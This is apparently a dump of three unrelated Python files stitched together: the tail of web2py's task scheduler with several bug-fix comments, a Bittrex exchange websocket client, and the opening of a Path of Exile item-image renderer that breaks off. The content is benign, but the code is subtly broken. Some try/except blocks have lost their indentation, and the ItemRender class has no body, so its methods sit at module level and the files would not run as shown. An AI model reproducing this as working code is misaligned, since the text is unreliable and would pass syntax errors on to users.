                (~ws.status.belongs(exclusion))
            ).update(status=action)
    else:
        for group in group_names:
            # cap the number of affected workers via a subselect
            workers = db((ws.group_names.contains(group)) &
                         (~ws.status.belongs(exclusion))
                         )._select(ws.id, limitby=(0, limit))
            db(ws.id.belongs(workers)).update(status=action)
def disable(self, group_names=None, limit=None, worker_name=None):
    """Set DISABLED on the workers processing `group_names` tasks.

    A DISABLED worker will be kept alive but it won't be able to process
    any waiting tasks, essentially putting it to sleep.
    By default, all group_names of Scheduler's instantiation are selected.

    BUG FIX: `worker_name` was accepted but never forwarded, so disabling
    a single worker by name silently disabled whole groups instead.
    """
    self.set_worker_status(
        group_names=group_names,
        action=DISABLED,
        exclude=[DISABLED, KILL, TERMINATE],
        limit=limit,
        worker_name=worker_name)
def resume(self, group_names=None, limit=None, worker_name=None):
    """Wake a worker up (it will be able to process queued tasks).

    BUG FIX: `worker_name` was accepted but never forwarded to
    `set_worker_status`, so resuming a single worker was impossible.
    """
    self.set_worker_status(
        group_names=group_names,
        action=ACTIVE,
        exclude=[KILL, TERMINATE],
        limit=limit,
        worker_name=worker_name)
def terminate(self, group_names=None, limit=None, worker_name=None):
    """Set TERMINATE as worker status. The worker will wait for any
    currently running task to finish and then exit gracefully.

    BUG FIX: `worker_name` was accepted but never forwarded to
    `set_worker_status`, so terminating a single worker was impossible.
    """
    self.set_worker_status(
        group_names=group_names,
        action=TERMINATE,
        exclude=[KILL],
        limit=limit,
        worker_name=worker_name)
def kill(self, group_names=None, limit=None, worker_name=None):
    """Set KILL as worker status. The worker will be killed even if it's
    processing a task.

    BUG FIX: `worker_name` was accepted but never forwarded to
    `set_worker_status`, so killing a single worker was impossible.
    """
    self.set_worker_status(
        group_names=group_names,
        action=KILL,
        limit=limit,
        worker_name=worker_name)
def queue_task(self, function, pargs=None, pvars=None, **kwargs):
    """
    Queue tasks. This takes care of handling the validation of all
    parameters

    Args:
        function: the function (anything callable with a __name__)
        pargs: "raw" args to be passed to the function. Automatically
            jsonified. Defaults to an empty list.
        pvars: "raw" kwargs to be passed to the function. Automatically
            jsonified. Defaults to an empty dict.
        kwargs: all the parameters available (basically, every
            `scheduler_task` column). If args and vars are here, they
            should be jsonified already, and they will override pargs
            and pvars

    Returns:
        a dict just as a normal validate_and_insert(), plus a uuid key
        holding the uuid of the queued task. If validation is not passed
        ( i.e. some parameters are invalid) both id and uuid will be None,
        and you'll get an "error" dict holding the errors found.
    """
    # BUG FIX: mutable default arguments ([] / {}) are shared across
    # calls; use None sentinels instead.
    if pargs is None:
        pargs = []
    if pvars is None:
        pvars = {}
    if hasattr(function, '__name__'):
        function = function.__name__
    # explicit args/vars/uuid/task_name in kwargs override the defaults
    targs = kwargs.pop('args', None) or dumps(pargs)
    tvars = kwargs.pop('vars', None) or dumps(pvars)
    tuuid = kwargs.pop('uuid', None) or web2py_uuid()
    tname = kwargs.pop('task_name', None) or function
    immediate = kwargs.pop('immediate', None)
    cronline = kwargs.get('cronline')
    kwargs.update(
        function_name=function,
        task_name=tname,
        args=targs,
        vars=tvars,
        uuid=tuuid,
    )
    if cronline:
        try:
            # BUG FIX: the original passed the *bound method* `self.now`
            # instead of calling it, so CronParser always raised here and
            # the cronline was silently ignored.
            start_time = kwargs.get('start_time', self.now())
            next_run_time = CronParser(cronline, start_time).next()
            kwargs.update(start_time=start_time, next_run_time=next_run_time)
        except Exception:
            # invalid cronline: let validate_and_insert report the error
            pass
    if 'start_time' in kwargs and 'next_run_time' not in kwargs:
        kwargs.update(next_run_time=kwargs['start_time'])
    db = self.db
    rtn = db.scheduler_task.validate_and_insert(**kwargs)
    if not rtn.errors:
        rtn.uuid = tuuid
        if immediate:
            # wake the ticker so the task gets assigned right away
            db(
                (db.scheduler_worker.is_ticker == True)
            ).update(status=PICK)
    else:
        rtn.uuid = None
    return rtn
def task_status(self, ref, output=False):
    """
    Retrieves task status and optionally the result of the task

    Args:
        ref: can be

            - an integer : lookup will be done by scheduler_task.id
            - a string : lookup will be done by scheduler_task.uuid
            - a `Query` : lookup as you wish, e.g. ::

                db.scheduler_task.task_name == 'test1'

        output(bool): if `True`, fetch also the scheduler_run record

    Returns:
        a single Row object, for the last queued task.
        If output == True, returns also the last scheduler_run record.
        The scheduler_run record is fetched by a left join, so it can
        have all fields == None

    Raises:
        SyntaxError: if `ref` is none of the three supported types
    """
    from pydal.objects import Query
    db = self.db
    sr = db.scheduler_run
    st = db.scheduler_task
    if isinstance(ref, integer_types):
        q = st.id == ref
    elif isinstance(ref, str):
        q = st.uuid == ref
    elif isinstance(ref, Query):
        q = ref
    else:
        raise SyntaxError(
            "You can retrieve results only by id, uuid or Query")
    fields = [st.ALL]
    left = False
    orderby = ~st.id
    if output:
        # also fetch the run record, newest run first
        fields = st.ALL, sr.ALL
        left = sr.on(sr.task_id == st.id)
        orderby = ~st.id | ~sr.id
    row = db(q).select(
        *fields,
        **dict(orderby=orderby,
               left=left,
               limitby=(0, 1))
    ).first()
    if row and output:
        # decode the json-ified run result, if any
        row.result = row.scheduler_run.run_result and \
            loads(row.scheduler_run.run_result,
                  object_hook=_decode_dict) or None
    return row
def stop_task(self, ref):
    """Shortcut for task termination.

    If the task is RUNNING it will terminate it, meaning that status
    will be set as FAILED.

    If the task is QUEUED, its stop_time will be set as to "now",
    the enabled flag will be set to False, and the status to STOPPED

    Args:
        ref: can be

            - an integer : lookup will be done by scheduler_task.id
            - a string : lookup will be done by scheduler_task.uuid

    Returns:
        - 1 if task was stopped (meaning an update has been done)
        - None if task was not found, or if task was not RUNNING or QUEUED

    Note:
        Experimental
    """
    db = self.db
    st = db.scheduler_task
    sw = db.scheduler_worker
    if isinstance(ref, integer_types):
        q = st.id == ref
    elif isinstance(ref, str):
        q = st.uuid == ref
    else:
        raise SyntaxError(
            "You can retrieve results only by id or uuid")
    task = db(q).select(st.id, st.status, st.assigned_worker_name)
    task = task.first()
    rtn = None
    if not task:
        return rtn
    if task.status == 'RUNNING':
        # ask the worker that is elaborating the task to stop it
        q = sw.worker_name == task.assigned_worker_name
        rtn = db(q).update(status=STOP_TASK)
    elif task.status == 'QUEUED':
        # not started yet: disable it and mark it STOPPED
        rtn = db(q).update(
            stop_time=self.now(),
            enabled=False,
            status=STOPPED)
    return rtn
def get_workers(self, only_ticker=False):
    """Return a dict mapping `worker_name` to a Storage of its columns
    for all "registered" workers.

    With `only_ticker=True` only the workers currently flagged as the
    TICKER (if any) are returned.
    """
    db = self.db
    if only_ticker:
        selection = db(db.scheduler_worker.is_ticker == True)
    else:
        selection = db(db.scheduler_worker.id)
    return {
        row.worker_name: Storage(
            status=row.status,
            first_heartbeat=row.first_heartbeat,
            last_heartbeat=row.last_heartbeat,
            group_names=row.group_names,
            is_ticker=row.is_ticker,
            worker_stats=row.worker_stats,
        )
        for row in selection.select()
    }
def main():
    """
    allows to run worker without python web2py.py .... by simply::

        python gluon/scheduler.py

    Parses command-line options, imports the tasks file, connects to the
    database and starts the worker loop.
    """
    import optparse
    parser = optparse.OptionParser()
    parser.add_option(
        "-w", "--worker_name", dest="worker_name", default=None,
        help="start a worker with name")
    parser.add_option(
        "-b", "--heartbeat", dest="heartbeat", default=10,
        type='int', help="heartbeat time in seconds (default 10)")
    parser.add_option(
        "-L", "--logger_level", dest="logger_level",
        default=30,
        type='int',
        help="set debug output level (0-100, 0 means all, 100 means none;default is 30)")
    parser.add_option("-E", "--empty-runs",
                      dest="max_empty_runs",
                      type='int',
                      default=0,
                      help="max loops with no grabbed tasks permitted (0 for never check)")
    parser.add_option(
        "-g", "--group_names", dest="group_names",
        default='main',
        help="comma separated list of groups to be picked by the worker")
    parser.add_option(
        "-f", "--db_folder", dest="db_folder",
        default='/Users/mdipierro/web2py/applications/scheduler/databases',
        help="location of the dal database folder")
    parser.add_option(
        "-u", "--db_uri", dest="db_uri",
        default='sqlite://storage.sqlite',
        help="database URI string (web2py DAL syntax)")
    parser.add_option(
        "-t", "--tasks", dest="tasks", default=None,
        help="file containing task files, must define" +
        "tasks = {'task_name':(lambda: 'output')} or similar set of tasks")
    parser.add_option(
        "-U", "--utc-time", dest="utc_time", default=False,
        help="work with UTC timestamps"
    )
    (options, args) = parser.parse_args()
    if not options.tasks or not options.db_uri:
        print(USAGE)
    if options.tasks:
        path, filename = os.path.split(options.tasks)
        if filename.endswith('.py'):
            filename = filename[:-3]
        sys.path.append(path)
        print('importing tasks...')
        # BUG FIX: __import__(..., -1) used the Python 2 "relative import"
        # level, which raises ValueError on Python 3; importlib is the
        # portable way to import by name.
        import importlib
        tasks = importlib.import_module(filename).tasks
        print('tasks found: ' + ', '.join(list(tasks.keys())))
    else:
        tasks = {}
    group_names = [x.strip() for x in options.group_names.split(',')]
    logging.getLogger().setLevel(options.logger_level)
    print('groups for this worker: ' + ', '.join(group_names))
    # BUG FIX: precedence — ('...' + folder) or './' never applied the
    # fallback (and crashed on None); parenthesize the fallback instead.
    print('connecting to database in folder: ' + (options.db_folder or './'))
    print('using URI: ' + options.db_uri)
    db = DAL(options.db_uri, folder=options.db_folder, decode_credentials=True)
    print('instantiating scheduler...')
    scheduler = Scheduler(db=db,
                          worker_name=options.worker_name,
                          tasks=tasks,
                          migrate=True,
                          group_names=group_names,
                          heartbeat=options.heartbeat,
                          max_empty_runs=options.max_empty_runs,
                          utc_time=options.utc_time)
    # make SIGTERM exit cleanly instead of being ignored
    signal.signal(signal.SIGTERM, lambda signum, stack_frame: sys.exit(1))
    print('starting main worker loop...')
    scheduler.loop()


if __name__ == '__main__':
    main()
|
websocket_client.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# bittrex_websocket/websocket_client.py
# Stanislav Lazarov
import logging
from ._logger import add_stream_logger, remove_stream_logger
from threading import Thread
from ._queue_events import *
from .constants import EventTypes, BittrexParameters, BittrexMethods, ErrorMessages, OtherConstants
from ._auxiliary import process_message, create_signature, BittrexConnection
from ._abc import WebSocket
from queue import Queue
from ._exceptions import *
from signalr_aio import Connection
try:
from cfscrape import create_scraper as Session
except ImportError:
from requests import Session
logger = logging.getLogger(__name__)
class BittrexSocket(WebSocket):
    """SignalR-based websocket client for the Bittrex exchange.

    All work is serialized through an internal control queue: public
    methods only enqueue events (connect, subscribe, reconnect, close);
    a dedicated daemon thread pops them and performs the actual
    operations, so callers never block on network I/O.
    """

    def __init__(self, url=None):
        # queue of control events, consumed by ControlQueueThread
        self.control_queue = None
        # history of invoked hub methods; replayed on reconnect
        self.invokes = []
        self.tickers = None
        # BittrexConnection wrapper, set once connected
        self.connection = None
        self.threads = []
        # API credentials, set by authenticate()
        self.credentials = None
        self.url = BittrexParameters.URL if url is None else url
        self._start_main_thread()

    def _start_main_thread(self):
        """Spawn the control-queue consumer thread and enqueue the
        initial ConnectEvent."""
        self.control_queue = Queue()
        self.control_queue.put(ConnectEvent())
        thread = Thread(target=self.control_queue_handler, daemon=True, name='ControlQueueThread')
        self.threads.append(thread)
        thread.start()

    def control_queue_handler(self):
        """Event loop: pop control events and dispatch them until a
        CLOSE event is received."""
        while True:
            event = self.control_queue.get()
            if event is not None:
                if event.type == EventTypes.CONNECT:
                    self._handle_connect()
                elif event.type == EventTypes.SUBSCRIBE:
                    self._handle_subscribe(event.invoke, event.payload)
                elif event.type == EventTypes.RECONNECT:
                    self._handle_reconnect(event.error_message)
                elif event.type == EventTypes.CLOSE:
                    # NOTE(review): breaking here skips task_done() for the
                    # CloseEvent — confirm nothing join()s this queue.
                    self.connection.conn.close()
                    break
                self.control_queue.task_done()

    def _handle_connect(self):
        """Build the SignalR connection, register hub callbacks and start
        the socket thread."""
        connection = Connection(self.url, Session())
        hub = connection.register_hub(BittrexParameters.HUB)
        # debug channel also carries query-invoke replies (see _on_debug)
        connection.received += self._on_debug
        connection.error += self.on_error
        hub.client.on(BittrexParameters.MARKET_DELTA, self._on_public)
        hub.client.on(BittrexParameters.SUMMARY_DELTA, self._on_public)
        hub.client.on(BittrexParameters.SUMMARY_DELTA_LITE, self._on_public)
        hub.client.on(BittrexParameters.BALANCE_DELTA, self._on_private)
        hub.client.on(BittrexParameters.ORDER_DELTA, self._on_private)
        self.connection = BittrexConnection(connection, hub)
        thread = Thread(target=self._connection_handler, daemon=True, name='SocketConnectionThread')
        self.threads.append(thread)
        thread.start()

    def _connection_handler(self):
        """Run the blocking socket loop; translate close/error conditions
        into reconnect events."""
        if str(type(self.connection.conn.session)) == OtherConstants.CF_SESSION_TYPE:
            logger.info('Establishing connection to Bittrex through {}.'.format(self.url))
            logger.info('cfscrape detected, using a cfscrape session instead of requests.')
        else:
            logger.info('Establishing connection to Bittrex through {}.'.format(self.url))
        try:
            self.connection.conn.start()
        except ConnectionClosed as e:
            # 1000 = normal closure, 1006 = abnormal closure -> reconnect
            if e.code == 1000:
                logger.info('Bittrex connection successfully closed.')
            elif e.code == 1006:
                event = ReconnectEvent(e.args[0])
                self.control_queue.put(event)
        except ConnectionError as e:
            raise ConnectionError(e)
        except InvalidStatusCode as e:
            message = "Status code not 101: {}".format(e.status_code)
            event = ReconnectEvent(message)
            self.control_queue.put(event)

    def _handle_subscribe(self, invoke, payload):
        """Invoke a hub method, recording it in self.invokes so it can be
        replayed after a reconnect."""
        if invoke in [BittrexMethods.SUBSCRIBE_TO_EXCHANGE_DELTAS, BittrexMethods.QUERY_EXCHANGE_STATE]:
            # per-ticker invokes: one hub call per ticker
            for ticker in payload[0]:
                self.invokes.append({'invoke': invoke, 'ticker': ticker})
                self.connection.corehub.server.invoke(invoke, ticker)
                logger.info('Successfully subscribed to [{}] for [{}].'.format(invoke, ticker))
        elif invoke == BittrexMethods.GET_AUTH_CONTENT:
            self.connection.corehub.server.invoke(invoke, payload[0])
            self.invokes.append({'invoke': invoke, 'ticker': payload[0]})
            logger.info('Retrieving authentication challenge.')
        elif invoke == BittrexMethods.AUTHENTICATE:
            self.connection.corehub.server.invoke(invoke, payload[0], payload[1])
            logger.info('Challenge retrieved. Sending authentication. Awaiting messages...')
            # No need to append invoke list, because AUTHENTICATE is called from successful GET_AUTH_CONTENT.
        else:
            self.invokes.append({'invoke': invoke, 'ticker': None})
            self.connection.corehub.server.invoke(invoke)
            logger.info('Successfully invoked [{}].'.format(invoke))

    def _handle_reconnect(self, error_message):
        """Tear down the broken connection and replay all recorded
        invokes on a fresh one."""
        logger.error('{}.'.format(error_message))
        logger.error('Initiating reconnection procedure')
        events = []
        for item in self.invokes:
            event = SubscribeEvent(item['invoke'], item['ticker'])
            events.append(event)
        # Reset previous connection
        # (reaches into signalr_aio's name-mangled private transport to
        # shut its executor down; brittle against library upgrades)
        ws_loop = self.connection.conn._Connection__transport.ws_loop
        self.connection.conn.close()
        ws_loop._default_executor.shutdown(wait=False)
        ws_loop._default_executor = None
        self.invokes, self.connection = [], None
        # Restart
        self.control_queue.put(ConnectEvent())
        for event in events:
            self.control_queue.put(event)

    # ==============
    # Public Methods
    # ==============

    def subscribe_to_exchange_deltas(self, tickers):
        """Subscribe to order book / trade deltas for a list of tickers."""
        if type(tickers) is list:
            invoke = BittrexMethods.SUBSCRIBE_TO_EXCHANGE_DELTAS
            event = SubscribeEvent(invoke, tickers)
            self.control_queue.put(event)
        else:
            raise TypeError(ErrorMessages.INVALID_TICKER_INPUT)

    def subscribe_to_summary_deltas(self):
        """Subscribe to market summary deltas for all markets."""
        invoke = BittrexMethods.SUBSCRIBE_TO_SUMMARY_DELTAS
        event = SubscribeEvent(invoke, None)
        self.control_queue.put(event)

    def subscribe_to_summary_lite_deltas(self):
        """Subscribe to the lightweight market summary delta feed."""
        invoke = BittrexMethods.SUBSCRIBE_TO_SUMMARY_LITE_DELTAS
        event = SubscribeEvent(invoke, None)
        self.control_queue.put(event)

    def query_summary_state(self):
        """Request a one-off snapshot of all market summaries."""
        invoke = BittrexMethods.QUERY_SUMMARY_STATE
        event = SubscribeEvent(invoke, None)
        self.control_queue.put(event)

    def query_exchange_state(self, tickers):
        """Request a one-off order book snapshot for a list of tickers."""
        if type(tickers) is list:
            invoke = BittrexMethods.QUERY_EXCHANGE_STATE
            event = SubscribeEvent(invoke, tickers)
            self.control_queue.put(event)
        else:
            raise TypeError(ErrorMessages.INVALID_TICKER_INPUT)

    def authenticate(self, api_key, api_secret):
        """Start the challenge/response authentication flow; private
        channels start delivering once it completes."""
        self.credentials = {'api_key': api_key, 'api_secret': api_secret}
        event = SubscribeEvent(BittrexMethods.GET_AUTH_CONTENT, api_key)
        self.control_queue.put(event)

    def disconnect(self):
        """Ask the control thread to close the connection and stop."""
        self.control_queue.put(CloseEvent())

    # =======================
    # Private Channel Methods
    # =======================

    async def _on_public(self, args):
        """Decode a public-channel frame, tag its invoke type and forward
        it to the user's on_public handler."""
        msg = await process_message(args[0])
        if 'D' in msg:
            # 'D' payload: summary delta; record length distinguishes the
            # full feed from the lite feed
            if len(msg['D'][0]) > 3:
                msg['invoke_type'] = BittrexMethods.SUBSCRIBE_TO_SUMMARY_DELTAS
            else:
                msg['invoke_type'] = BittrexMethods.SUBSCRIBE_TO_SUMMARY_LITE_DELTAS
        else:
            msg['invoke_type'] = BittrexMethods.SUBSCRIBE_TO_EXCHANGE_DELTAS
        await self.on_public(msg)

    async def _on_private(self, args):
        """Decode a private-channel frame and forward it to on_private."""
        msg = await process_message(args[0])
        await self.on_private(msg)

    async def _on_debug(self, **kwargs):
        # `QueryExchangeState`, `QuerySummaryState` and `GetAuthContext` are received in the debug channel.
        await self._is_query_invoke(kwargs)

    async def _is_query_invoke(self, kwargs):
        """Match a debug-channel reply ('R') to the invoke that produced
        it ('I' indexes self.invokes) and route it accordingly."""
        if 'R' in kwargs and type(kwargs['R']) is not bool:
            invoke = self.invokes[int(kwargs['I'])]['invoke']
            if invoke == BittrexMethods.GET_AUTH_CONTENT:
                # challenge received: sign it and send AUTHENTICATE
                signature = await create_signature(self.credentials['api_secret'], kwargs['R'])
                event = SubscribeEvent(BittrexMethods.AUTHENTICATE, self.credentials['api_key'], signature)
                self.control_queue.put(event)
            else:
                msg = await process_message(kwargs['R'])
                if msg is not None:
                    msg['invoke_type'] = invoke
                    msg['ticker'] = self.invokes[int(kwargs['I'])].get('ticker')
                    await self.on_public(msg)

    # ======================
    # Public Channel Methods
    # ======================

    async def on_public(self, msg):
        """Override to receive public-channel messages."""
        pass

    async def on_private(self, msg):
        """Override to receive private-channel messages."""
        pass

    async def on_error(self, args):
        """Override to customize error handling; logs by default."""
        logger.error(args)

    # =============
    # Other Methods
    # =============

    @staticmethod
    def enable_log(file_name=None):
        """
        Enables logging.

        :param file_name: The name of the log file, located in the same directory as the executing script.
        :type file_name: str
        """
        add_stream_logger(file_name=file_name)

    @staticmethod
    def disable_log():
        """
        Disables logging.
        """
        remove_stream_logger()
|
utils.py | import binascii
import html
import json as js
import math
import os
import re
import threading
import unicodedata
import xml.etree.cElementTree as Etree
from collections import defaultdict
from collections import namedtuple
from io import BytesIO
from queue import Queue
import urllib3
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
from PIL import ImageOps
from bs4 import BeautifulSoup as Soup
from poe.exceptions import AbsentItemBaseException
from poe.exceptions import OutdatedPoBException, RequestException
from poe.models import Weapon, Armour, PassiveSkill, Gem
from poe.price import ItemPriceQuery, CurrencyQuery
from .constants import *
re_range = re.compile(r'\(.+?\)')
# Simple cursor class that lets me handle moving around the image quite well
# also get around the hassle of maintaining position and adding and subtracting.
def strip_unicode(text: str):
    """Return *text* with combining marks removed (e.g. 'café' -> 'cafe')."""
    decomposed = unicodedata.normalize('NFD', text)
    return ''.join(ch for ch in decomposed if unicodedata.category(ch) != 'Mn')
class Cursor:
    """Simple 2-D drawing cursor.

    Tracks a current (x, y) position so callers don't have to maintain
    coordinates and offsets by hand; `reset_x` snaps back to the left
    margin supplied at construction time.
    """

    def __init__(self, x_start):
        self.x, self.y = 0, 0
        self.x_start = x_start

    @property
    def pos(self):
        """Current (x, y) position of the cursor."""
        return (self.x, self.y)

    def move_x(self, quantity):
        """Shift horizontally by `quantity` pixels (may be negative)."""
        self.x = self.x + quantity

    def move_y(self, quantity):
        """Shift vertically by `quantity` pixels (may be negative)."""
        self.y = self.y + quantity

    def reset_x(self):
        """Snap back to the configured left margin."""
        self.x = self.x_start
# Cause relative paths are ass
_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'data')
# Find links wrapped in [[]] returned by Gamepedia
reg = re.compile(r'\[\[[^\]]+\]\]')
# Preload static lookup data shipped alongside the module.
try:
    with open(f"{_dir}/keystones.json") as f:
        keystones = js.load(f)
    with open(f"{_dir}/ascendancy.json") as f:
        asc_nodes = js.load(f)
    with open(f"{_dir}/items.json") as f:
        items = js.load(f)
except Exception:
    # NOTE(review): best-effort load — import still succeeds when the data
    # files are missing, but `keystones`/`asc_nodes`/`items` are then
    # undefined; broad Exception also hides malformed JSON. Confirm callers
    # tolerate that.
    pass
def unescape_to_list(props, ret_matches=False):
    """Unescape HTML-encoded wiki property text into a list of lines.

    Args:
        props: raw property string from the wiki API; may contain HTML
            entities, ``<br>`` line separators and ``[[target|label]]``
            link markup.
        ret_matches: if True, also return the raw ``[[...]]`` matches.

    Returns:
        list of cleaned text lines, or ``(lines, matches)`` when
        ``ret_matches`` is True.
    """
    matches = reg.findall(props)
    # a collapsed table means tabular props, handled in the else branch
    has_table = Soup(html.unescape(props)).select_one('table.mw-collapsed tr')
    if not has_table:
        for match in set(matches):
            if '|' in match:
                # [[target|label]] -> label
                props = props.replace(match, match.split('|')[1].strip(']]'))
            else:
                # [[target]] -> target
                props = props.replace(match, match.strip('[[]]'))
        prop_list = html.unescape(props).replace('<br />', '<br>').split('<br>')
        prop_list = [x.replace('<em class="tc -corrupted">', '').replace('</em>', '') for x in prop_list]
    else:
        # FIXME: non-iterable object
        # NOTE(review): select_one returns a single Tag; iterating it walks
        # that row's children, not all table rows — confirm whether
        # select() over rows was intended here.
        prop_list = [x.text for x in has_table]
    if ret_matches:
        return prop_list, matches
    return prop_list
class ItemRender:
def __init__(self, flavor):
    """Load all fonts and frame/background assets for the given flavor.

    Args:
        flavor: visual theme name (case-insensitive); used as the file
            prefix when loading the name bar and separator images.
    """
    self.flavor = flavor.lower()
    # fonts: body text, italic lore text and the larger header
    self.font = ImageFont.truetype(f'{_dir}//Fontin-SmallCaps.ttf', 15)
    self.lore_font = ImageFont.truetype(f'{_dir}//Fontin-SmallCapsItalic.ttf', 15)
    self.header_font = ImageFont.truetype(f'{_dir}//Fontin-SmallCaps.ttf', 20)
    # flavor-specific chrome for the item name bar and separators
    self.namebar_left = Image.open(f'{_dir}//{self.flavor}_namebar_left.png').convert('RGBA')
    self.namebar_right = Image.open(f'{_dir}//{self.flavor}_namebar_right.png').convert('RGBA')
    self.namebar_trans = Image.open(f'{_dir}//{self.flavor}_namebar_trans.png').convert('RGBA')
    self.separator = Image.open(f'{_dir}//{self.flavor}_separator.png').convert('RGBA')
    self.div_frame = Image.open(f'{_dir}//div_frame.png').convert('RGBA')
    # influence badges shown next to the item name
    self.elder_badge = Image.open(f'{_dir}//elder_badge.png').convert('RGBA')
    self.shaper_badge = Image.open(f'{_dir}//shaper_badge.png').convert('RGBA')
    self.redeemer_badge = Image.open(f'{_dir}//redeemer_badge.png').convert('RGBA')
    self.crusader_badge = Image.open(f'{_dir}//crusader_badge.png').convert('RGBA')
    self.hunter_badge = Image.open(f'{_dir}//hunter_badge.png').convert('RGBA')
    self.warlord_badge = Image.open(f'{_dir}//warlord_badge.png').convert('RGBA')
    # passive-tree node frames
    self.passive_frame = Image.open(f'{_dir}//passive_frame.png').convert('RGBA')
    self.keystone_frame = Image.open(f'{_dir}//keystone_frame.png').convert('RGBA')
    self.notable_frame = Image.open(f'{_dir}//notable_frame.png').convert('RGBA')
    self.ascendancy_frame = Image.open(f'{_dir}//ascendancy_frame.png').convert('RGBA')
    # influence backgrounds keyed by (width, height) in inventory cells
    self.shaper_backgrounds = {
        ('1', '1'): Image.open(f'{_dir}//shaper_bg_1x1.png').convert('RGBA'),
        ('1', '2'): Image.open(f'{_dir}//shaper_bg_1x2.png').convert('RGBA'),
        ('1', '3'): Image.open(f'{_dir}//shaper_bg_1x3.png').convert('RGBA'),
        ('1', '4'): Image.open(f'{_dir}//shaper_bg_1x4.png').convert('RGBA'),
        ('2', '1'): Image.open(f'{_dir}//shaper_bg_2x1.png').convert('RGBA'),
        ('2', '2'): Image.open(f'{_dir}//shaper_bg_2x2.png').convert('RGBA'),
        ('2', '3'): Image.open(f'{_dir}//shaper_bg_2x3.png').convert('RGBA'),
        ('2', '4'): Image.open(f'{_dir}//shaper_bg_2x4.png').convert('RGBA'),
    }
    # NOTE(review): no ('1', '2') elder background is loaded — confirm the
    # asset simply doesn't exist for that size.
    self.elder_backgrounds = {
        ('1', '1'): Image.open(f'{_dir}//elder_bg_1x1.png').convert('RGBA'),
        ('1', '3'): Image.open(f'{_dir}//elder_bg_1x3.png').convert('RGBA'),
        ('1', '4'): Image.open(f'{_dir}//elder_bg_1x4.png').convert('RGBA'),
        ('2', '1'): Image.open(f'{_dir}//elder_bg_2x1.png').convert('RGBA'),
        ('2', '2'): Image.open(f'{_dir}//elder_bg_2x2.png').convert('RGBA'),
        ('2', '3'): Image.open(f'{_dir}//elder_bg_2x3.png').convert('RGBA'),
        ('2', '4'): Image.open(f'{_dir}//elder_bg_2x4.png').convert('RGBA'),
    }
    # A namedtuple to handle properties.
    # This works fairly well except for Separators which is kinda hacky
    self.prop = namedtuple('Property', ['title', 'text', 'color'])
    # I don't know why PIL does this, but spacing with fonts is not consistent,
    # this means I have to compensate by spacing more after separators and stuff
    self.last_action = str()
# Go through our total properties and image to get the image/box size
# I feel the code is a bit redundant considering I have two instances
# of an if-fest, calc_size and sort_stats.
# TODO: reduce redundancy
def calc_size(self, stats, header):
    """Compute the (width, height) in pixels of the final item image.

    Walks the stat list once, accumulating per-line heights and tracking
    the widest rendered line (header included) to derive the width.

    Args:
        stats: list of Property namedtuples produced by sort_stats();
            the special titles "Separator", "Elemental Damage:",
            "Requires", "Lore", "Reminder" and "Image" get custom sizing.
        header: the item name rendered in the header bar.

    Returns:
        (width, height) tuple including side padding and the name bar.
    """
    # start from the header width plus the name-bar end caps
    width = self.header_font.getsize(header)[0] + (self.namebar_left.size[0] * 2) + 4
    height = 0
    # last_sep tracks whether the previous stat was a separator, which
    # needs extra spacing afterwards (see note in __init__)
    last_sep = False
    for stat in stats:
        if stat.title == "Separator":
            height += SEPARATOR_HEIGHT + SEPARATOR_SPACING
            last_sep = True
            continue
        elif stat.title == "Elemental Damage:":
            if last_sep:
                height += SEPARATOR_SPACING
            else:
                height += STAT_SPACING
            height += STAT_HEIGHT
            # one line: title followed by every element's damage range
            stat_text = stat.title
            for element in stat.text.keys():
                stat_text += f" {stat.text[element]}"
            last_sep = False
        elif stat.title == "Requires":
            if last_sep:
                height += SEPARATOR_SPACING
            else:
                height += STAT_SPACING
            height += STAT_HEIGHT
            # one line: "Requires Level X, Str Y, ..." (comma-separated)
            stat_text = stat.title
            for attr in stat.text.keys():
                stat_text += f" {attr.title()} {stat.text[attr]}{'' if list(stat.text.keys())[-1] == attr else ','}"
            last_sep = False
        elif stat.title == "Lore" or stat.title == "Reminder":
            # multi-line italic text: measured with the lore font, then
            # skips the shared width check below via `continue`
            if type(stat.text) is list:
                ht = LINE_SPACING
                for line in stat.text:
                    w = self.lore_font.getsize(line)
                    ht += STAT_HEIGHT
                    if w[0] > width:
                        width = w[0]
                height += ht + STAT_SPACING
            else:
                w = self.lore_font.getsize(stat.text)
                if w[0] > width:
                    width = w[0]
                height += STAT_HEIGHT
            last_sep = False
            continue
        elif stat.title == "Image":
            height += stat.text.size[1] + IMAGE_PADDING
            last_sep = False
        else:
            if last_sep:
                height += SEPARATOR_SPACING
            else:
                height += STAT_SPACING
            height += STAT_HEIGHT
            stat_text = f"{stat.title}{stat.text}"
            last_sep = False
        if stat.title != "Image":
            # FIXME: referenced before assignment
            # NOTE(review): every branch reaching this line sets stat_text
            # ("Separator" and "Lore"/"Reminder" continue first), so the
            # FIXME looks stale — confirm before removing it.
            w = self.font.getsize(stat_text)
        else:
            w = stat.text.size
        if w[0] > width:
            width = w[0]
    # 34 is the 17px padding from both sides
    return width + 34, height + self.namebar_trans.size[1] + 25
def sort_stats(self, item):
    """Build the ordered list of tooltip lines ("props") for *item*.

    Returns a list of ``self.prop`` entries (title, text, color) in the
    order they should be drawn, with "Separator" entries between
    sections.  Handles weapons, armour, jewellery, gems, prophecies and
    passive skills; icons are fetched over HTTP and appended as
    ``"Image"`` props.
    """
    stats = list()
    separator = self.prop("Separator", None, None)
    if not isinstance(item, PassiveSkill):
        if 'weapon' in item.tags:
            stats.append(self.prop(item.item_class, '', DESC_COLOR))
            if item.quality:
                stats.append(self.prop("Quality: ", f"+{item.quality}%", PROP_COLOR))
            if item.physical_damage:
                stats.append(self.prop("Physical Damage: ", item.physical_damage, PROP_COLOR))
            # NOTE(review): includes any present element attribute even if its
            # value is falsy — confirm upstream guarantees non-zero values.
            elements = {
                element.split('_')[0]: getattr(item, element) for element in [
                    'fire_damage', 'cold_damage', 'lightning_damage'
                ] if hasattr(item, element)
            }
            if elements:
                stats.append(self.prop("Elemental Damage:", elements, None))
            if item.chaos_damage:
                stats.append(self.prop("Chaos Damage: ", item.chaos_damage, CHAOS_COLOR))
            if item.critical_chance:
                stats.append(self.prop("Critical Strike Chance: ", item.critical_chance, None))
            if item.attack_speed:
                stats.append(self.prop("Attacks Per Second: ", item.attack_speed, PROP_COLOR))
            if int(item.range):
                stats.append(self.prop("Weapon Range: ", item.range, None))
            stats.append(separator)
        elif 'armour' in item.tags:
            if item.quality:
                stats.append(self.prop("Quality: ", f"+{item.quality}%", PROP_COLOR))
            if item.block:
